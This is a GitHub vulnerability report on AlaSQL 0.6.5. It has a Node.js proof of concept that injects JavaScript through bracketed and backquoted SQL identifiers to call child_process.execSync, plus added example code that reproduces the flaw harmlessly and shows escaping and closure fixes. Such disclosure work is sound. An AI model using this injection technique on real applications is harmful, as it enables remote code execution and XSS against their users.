
Code Injection Vulnerability During Processing Literal


Hi, I found a potential code injection vulnerability in the latest version (0.6.5) of AlaSQL.

Proof of Concept

Browser

http://jsfiddle.net/msoc7kL8/

Node.js

const alasql = require('alasql');

const genPayload = command => `
new Function(
    'return this.process.mainModule.require'
)()('child_process').execSync(${JSON.stringify(command)})
`;


const res = alasql(
    // Initialize the database
    'CREATE table i_am_a_table;' +
    `INSERT INTO i_am_a_table VALUES (1337);` +

    // Code injection in four different ways
    `UPDATE i_am_a_table SET [0'+${genPayload(">&2 echo UPDATE pwned $(whoami)")}+']=42;` +
    `SELECT * from i_am_a_table where whatever=['+${genPayload(">&2 echo SELECT pwned $(whoami)")}+'];` +
    `SELECT \`'+${genPayload(">&2 echo SELECT pwned again, back-quote works too. $(whoami)")}+'\` from i_am_a_table where 1;` +
    `SELECT [whatever||${genPayload('>&2 echo calling function pwned')}||]('whatever');`
);

Description

AlaSQL doesn't restrict the characters in square brackets [ ] or back-quotes ` by design; that's fine. But when we compile the SQL query to JavaScript code, those strings are concatenated into the generated JavaScript directly without any sanitization or escaping, which can cause a code injection vulnerability.

For example, in the UPDATE PoC for the browser, we can refer to the following code: https://github.com/agershun/alasql/blob/75846cfb85f717c70e2a6f316303b2881febd81a/src/74update.js#L58-L62

In this case, col.column.columnid is 0'+alert("UPDATE pwned")+', and this string is directly concatenated into the variable s in line 59. After that, the variable s is appended to the functionBody argument of that new Function in line 62. Now, the alert statement will be executed when this SQL query is executed.

Summary

Through this code injection vulnerability, if an attacker can control the SQL query (no matter whether that is a by-design feature or the result of SQL injection), then it might lead to an XSS in the browser, or even RCE (remote code execution) in a Node.js application.
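The concatenation the report describes, reduced to a minimal getter compiler and placed next to two fixed variants. This is added example code, not AlaSQL's source: compileGetterUnsafe is a hypothetical stand-in for the code-generation path in src/74update.js, and the hostile identifier has the same shape as the report's PoC but only sets a flag instead of calling alert() or execSync().

```javascript
// Added example (not AlaSQL code): a minimal "SQL-to-JS" getter compiler
// that reproduces the reported bug, next to two ways of closing it.

// compileGetterUnsafe mirrors the pattern the report describes: the column
// identifier is concatenated straight into the functionBody of new Function.
function compileGetterUnsafe(columnid) {
  const s = "return r['" + columnid + "'];";
  return new Function('r', s);
}

// Fix 1: if code generation must stay, emit the identifier as a JavaScript
// string literal. JSON.stringify escapes quotes, backslashes and control
// characters, so whatever the identifier contains stays inside the literal
// (ES2019+ engines also accept U+2028/U+2029 inside string literals).
function compileGetterEscaped(columnid) {
  const s = 'return r[' + JSON.stringify(String(columnid)) + '];';
  return new Function('r', s);
}

// Fix 2 (preferable): do not generate code for the lookup at all. A closure
// carries the identifier as data, so there is no source text to inject into.
function compileGetterClosure(columnid) {
  const key = String(columnid);
  return (r) => r[key];
}

// Constructed hostile identifier with the same shape as the report's PoC
// (0'+alert("UPDATE pwned")+'). The payload only sets a flag on globalThis.
const HOSTILE_COLUMN = "0'+(globalThis.injected=true)+'";

// Constructed row: one key is the identifier taken literally, the other is
// what the injected expression evaluates to ('0' + true + '' === '0true').
const SAMPLE_ROW = {
  [HOSTILE_COLUMN]: 'literal key',
  '0true': 'key computed by injected code',
};

// Run one compiler against the hostile identifier and report both the value
// it read and whether the injected expression actually executed.
function probe(compile) {
  delete globalThis.injected;
  const value = compile(HOSTILE_COLUMN)(SAMPLE_ROW);
  return { value, injected: globalThis.injected === true };
}

function runUnsafe() { return probe(compileGetterUnsafe); }
function runEscaped() { return probe(compileGetterEscaped); }
function runClosure() { return probe(compileGetterClosure); }

console.log('unsafe  :', runUnsafe());   // payload ran, wrong key read
console.log('escaped :', runEscaped());  // identifier treated as data
console.log('closure :', runClosure());  // identifier treated as data
```

The unsafe compiler reads the key '0true' and leaves globalThis.injected set, which is exactly the alert()/execSync() path from the PoC; both fixed compilers look up the identifier as a literal key and never evaluate its contents. Of the two fixes, the closure removes the new Function call entirely, which also makes the code work under a Content Security Policy that forbids unsafe-eval.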

Issue Analytics

  • State: closed
  • Created 3 years ago
  • Reactions: 2
  • Comments: 12 (8 by maintainers)

Top GitHub Comments

1 reaction
mathiasrw commented, Mar 16, 2021

Found it!

1 reaction
splitline commented, Mar 13, 2021

Hm, it’s weird, I think I sent to the correct email.

I've sent the PoC from my other email (splitline.cs09g [at] nctu.edu.tw) to you again, please check.
